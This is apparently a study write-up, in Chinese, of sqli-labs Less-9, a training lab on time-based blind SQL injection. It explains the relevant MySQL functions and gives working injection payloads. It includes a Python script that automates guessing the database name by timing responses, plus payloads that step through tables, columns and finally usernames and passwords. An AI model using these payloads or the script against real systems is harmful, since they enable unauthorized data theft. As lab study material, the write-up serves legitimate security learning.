Pss-9
这一关考察的是时间盲注
先练习几个常见命令语句:
select sleep(5);--延迟5s输出结果
if (1>0,'ture','false');--输出‘ture’ /if (1<0,'ture','false');--输出‘false’
select ascii('')/select ord('')返回字符串第一个字符的结果
select length(‘hsgfdsg’);--返回字符串长度
select substr/substring/mid('dfgdhd',2,2);--输出fg,无0位
补充知识点:
1、时间盲注:根据页面的响应时间来判断是否存在注入,联合(页面没有回显位置),报错(页面不显示数据库报错信息),布尔(s/f都只显示一种结果)都不行的时候考虑,
2、步骤:
(1)判断注入点:
?id=1 and if(1,sleep(5),3) ?id=1' and if(1,sleep(5),3) ?id=1" and if(1,sleep(5),3)(2)判断长度:
?id=1' and if((length(查询语句) =1), sleep(5), 3)(3)枚举字符
?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3)3.时间盲注从网上找的自动化pythony脚本
-
import requests import time# 将url 替换成你的靶场关卡网址 # 修改两个对应的payload# 目标网址(不带参数) url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/" # 猜解长度使用的payload payload_len = """?id=1' and if((length(database()) ={n}) ,sleep(5),3) -- a""" # 枚举字符使用的payload payload_str = """?id=1' and if((ascii(substr((database()),{n},1)) ={r}) , sleep(5), 3) -- a"""# 获取长度 def getLength(url, payload):length = 1 # 初始测试长度为1while True:start_time = time.time()response = requests.get(url= url+payload_len.format(n= length))# 页面响应时间 = 结束执行的时间 - 开始执行的时间use_time = time.time() - start_time# 响应时间>5秒时,表示猜解成功if use_time > 5:print('测试长度完成,长度为:', length,)return length;else:print('正在测试长度:',length)length += 1 # 测试长度递增# 获取字符 def getStr(url, payload, length):str = '' # 初始表名/库名为空# 第一层循环,截取每一个字符for l in range(1, length+1):# 第二层循环,枚举截取字符的每一种可能性for n in range(33, 126):start_time = time.time()response = requests.get(url= url+payload_str.format(n= l, r= n))# 页面响应时间 = 结束执行的时间 - 开始执行的时间use_time = time.time() - start_time# 页面中出现此内容则表示成功if use_time > 5:str+= chr(n)print('第', l, '个字符猜解成功:', str)break;return str;# 开始猜解 length = getLength(url, payload_len) getStr(url, payload_str, length)
无论输入id=1/id=1'/id-1"全部不报错没回显,考虑时间盲注
先通过时间函数判断闭合点 ,单引号闭合,加载了5s
?id=1' and if((length(database())>8),sleep(5),66)--+到8的时候就不转了,数据库长度为8
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+?id=1'and if((ascii(substr(database(),1,1))>100),sleep(5),0)--+转了5s,通过这种界定,逐个试,是115,最后得出security
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+用上面这个判断表个数,后面的其实就是变了个函数机理都一样
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6,sleep(5),0)--+ --1
......
?id=1' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),0)--+ --4判断表长
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),0)--+表名
?id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)--+字段
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=2,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,sleep (5),0)--+
....
?id=1' and if(length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1))=8,sleep(5),0)--+
?id=1' and if(ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,1))=112,sleep (5),0)--+字段长度,名称
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),1)--+
?id=1' and if(ascii(substr((select password from users limit 0,1),1,1))=68,sleep(5),1)--+得username, password
第10关也是时间盲注
